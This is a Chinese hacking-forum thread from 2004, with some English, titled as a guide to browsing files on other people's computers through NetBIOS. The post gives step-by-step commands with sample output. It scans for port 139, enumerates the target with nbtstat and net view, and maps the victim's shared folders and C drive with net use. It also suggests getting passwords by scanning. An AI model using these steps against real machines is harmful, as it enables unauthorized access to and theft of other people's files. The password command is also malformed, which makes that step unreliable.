|
 | 作者: qmdjzgqt [qmdjzgqt]
 论坛用户 |
登录 |
| 本帖由 [NetDemon] 从 << 黑客进阶>> 转移而来利用NetBIOS浏览他人电脑中的资料 NetBIOS (Network basic input output system)即网络基本输入输出系统。它在Windows系统中用于文件和打印机共享。 1. NetBIOS To use NetBIOS remotely the computer has to have it running and unprotected first. To find if a computer has netBIOS boost up your favourite portscanner and look for netBIOS: 要远程使用NetBIOS,目标计算机必须运行该服务并未对之实施保护。可以打开端口扫描器进行扫描: 25/tcp open smtp 110/tcp open pop-3 135/tcp open loc-srv 139/tcp open netBIOS-ssn 如果结果如上,恭喜... 2. nbtstat 我们可以使用nbtstat获得攻击所需信息。打开WinXP的控制台或早期Windows版本的命令行。 输入命令: -------------------------------------------------------------------------------- c:\>nbtstat -A 127.0.0.1 -------------------------------------------------------------------------------- 如果使用IP地址就使用-A,使用主机名则使用-a. 运行后将获得如下信息: code:-------------------------------------------------------------------------------- Local Area Connection 3: Node IpAddress: [xxx.xxx.xxx.xxx] Scope Id: [] NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- computername <00> UNIQUE Registered workgroupname <00> GROUP Registered computername <20> UNIQUE Registered workgroupname <1E> GROUP Registered workgroupname <1D> UNIQUE Registered ..__MSBROWSE__. <01> GROUP Registered MAC Address = xx-xx-xx-xx-xx-xx -------------------------------------------------------------------------------- 下面这一行 -------------------------------------------------------------------------------- computername <20> UNIQUE Registered -------------------------------------------------------------------------------- 很有用,因为<20>表示文件共享已经启用了。 那就意味着我们可以尝试连接到该电脑。 首先,我们需要知道硬盘名称等信息,并且我们还需要知道它是否安装的是XP以及有没有开放文件共享。可以使用命令: net view \\ipaddress来完成。 输入: -------------------------------------------------------------------------------- C:\>net view \\127.0.0.1 Shared resources at \\xxx.xxx.xxx.xxx Share name Type Used as Comment ----------------------------------- SharedDocs Disk The command completed successfully. -------------------------------------------------------------------------------- 应该获得如上显示信息 (在非XP系统中会有所不同). 该做点有趣的事情了: 如果想要像使用本地计算机一样使用和浏览该电脑,我们可以使用net use。格式如下: net use letter: \\ipaddress\name 输入: -------------------------------------------------------------------------------- c:\>net use g: \\127.0.0.1\SharedDocs The command completed successfully. c:\>net use h: \\127.0.0.1\C The command completed successfully. -------------------------------------------------------------------------------- 现在目标计算机的硬盘已映射为我们刚刚指定的盘符。(确保这一盘符不与本地电脑已使用盘符冲突)完成后就可以如同浏览本地电脑一样进行浏览 : 输入: -------------------------------------------------------------------------------- c:\>cd g: g:\> -------------------------------------------------------------------------------- 在windows XP中,可以直接打开“我的电脑”,在图形界面下浏览刚刚添加的映射盘. 完成后,记得要从机器中删除映射盘。 输入: -------------------------------------------------------------------------------- c:\>net use /delete g: g: was deleted successfully. -------------------------------------------------------------------------------- 有些系统需要密码才可以进入 (win2k, WinNT): (可以通过扫描器扫描) 获得密码后可使用如下命令进入: -------------------------------------------------------------------------------- net use password \\ip\sharename -------------------------------------------------------------------------------- |
| 地主 发表时间: 04-12-17 21:48 |
| 回复: qmdjzgqt [qmdjzgqt] 论坛用户 |
登录 |
 |
| B1层 发表时间: 04-12-17 22:40 |
 | 回复: wyq980 [wyq980]  论坛用户 |
登录 |
|
NetBIOS 这各名名词是程序 还是? |
| B2层 发表时间: 04-12-17 22:45 |
| 回复: qmdjzgqt [qmdjzgqt] 论坛用户 |
登录 |
|
NetBIOS (Network basic input output system)即网络基本输入输出系统。它在Windows系统中用于文件和打印机共享。 我认为是共享 |
| B3层 发表时间: 04-12-18 20:17 |
| 回复: wyq980 [wyq980] 论坛用户 |
登录 |
|
试试看 |
| B4层 发表时间: 04-12-19 17:14 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 利用NetBIOS浏览他人电脑中的资料